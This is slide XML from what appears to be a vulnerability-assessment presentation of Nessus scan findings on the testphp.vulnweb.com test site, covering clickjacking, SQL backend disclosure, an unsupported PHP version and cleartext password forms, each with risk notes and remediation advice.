                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' directive) HTTP header with the page's response.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>This prevents the page's content from being rendered by another site when using the frame or iframe HTML tags.</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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625" name="Google Shape;625;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7228114" y="4119154"/>
            <a:ext cx="444137" cy="35705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626" name="Google Shape;626;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10955383" y="4119154"/>
            <a:ext cx="444137" cy="357052"/>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627" name="Google Shape;627;p77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9318172" y="4119154"/>
            <a:ext cx="444137" cy="357052"/>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78"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539496" y="892193"/>
            <a:ext cx="8126404" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Application Potentially Vulnerable to Clickjacking</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Google Shape;633;p78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400595" y="1262743"/>
            <a:ext cx="10302240" cy="5486400"/>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050">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>The following pages do not use a clickjacking mitigation response header and contain a clickable event : - http://testphp.vulnweb.com/ - http://testphp.vulnweb.com/AJAX/ - http://testphp.vulnweb.com/AJAX/index.php - http://testphp.vulnweb.com/AJAX/index.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/.php/showxml.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/.php/showxml.php/showxml.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/.php/showxml.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/.php - http://testphp.vulnweb.com/AJAX/index.php/showxml.php/showxml.php/showxml.php/showxml.php - http://testphp.vulnweb.com/artists.php - http://testphp.vulnweb.com/cart.php - http://testphp.vulnweb.com/categories.php - http://testphp.vulnweb.com/disclaimer.php - http://testphp.vulnweb.com/guestbook.php - http://testphp.vulnweb.com/index.php - http://testphp.vulnweb.com/listproducts.php - http://testphp.vulnweb.com/login.php - http://testphp.vulnweb.com/search.php - http://testphp.vulnweb.com/signup.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1050">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590481" y="934865"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>29. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Application SQL Backend Identification</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="639" name="Google Shape;639;p79"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="264160" y="1574945"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="379300">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1064200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>At least one web application hosted on the remote web server is built on a SQL backend that Nessus was able to identify by looking at error messages.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:b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00200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                              HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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706875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>This kind of information may help an attacker fine-tune attacks against the application and its backend.</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91125">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1300700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>filter out error messages</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640" name="Google Shape;640;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7210697" y="3126377"/>
            <a:ext cx="513806" cy="42672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641" name="Google Shape;641;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10833463" y="3126377"/>
            <a:ext cx="513806" cy="42672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642" name="Google Shape;642;p79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9152709" y="3126377"/>
            <a:ext cx="513806" cy="426720"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="448056"/>
            <a:ext cx="6877119" cy="496824"/>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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP Unsupported Version Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="109" name="Google Shape;109;p8"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="294640" y="1410546"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11328400"/>
              </a:tblGrid>
              <a:tr h="418250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1036600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>According to its version, the installation of PHP on the remote host is no longer supported.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="-285750" lvl="0" marL="285750" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Lack of support implies that no new security patches for the product will be released by the vendor. As a result, it is likely to contain security vulnerabilities.</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04800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                            HIGH                  MEDIUM                  LOW </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874050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>This version of PHP allows remote attacker to execute arbitrary code or denial of service. </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355025">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1706325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>  We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>upgrade to a version of PHP that is currently supported.</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110" name="Google Shape;110;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6624320" y="2885440"/>
            <a:ext cx="447040" cy="314960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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111" name="Google Shape;111;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8524240" y="2885440"/>
            <a:ext cx="447040" cy="314960"/>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112" name="Google Shape;112;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10200640" y="2885440"/>
            <a:ext cx="447040" cy="314960"/>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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617001" y="892193"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Application SQL Backend Identification</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Google Shape;648;p80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018903" y="2029097"/>
            <a:ext cx="9239794" cy="2133600"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>The web application appears to be based on MySQL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>This information was leaked by these URLs : http://testphp.vulnweb.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568960" y="909610"/>
            <a:ext cx="7952233" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>30. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Server Transmits Cleartext Credentials</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="654" name="Google Shape;654;p81"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="429623" y="1405927"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="281075">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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228600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The remote web server contains several HTML form fields containing an input of type 'password' which transmit their information to a remote web server in cleartext.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:br>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:b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28600">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
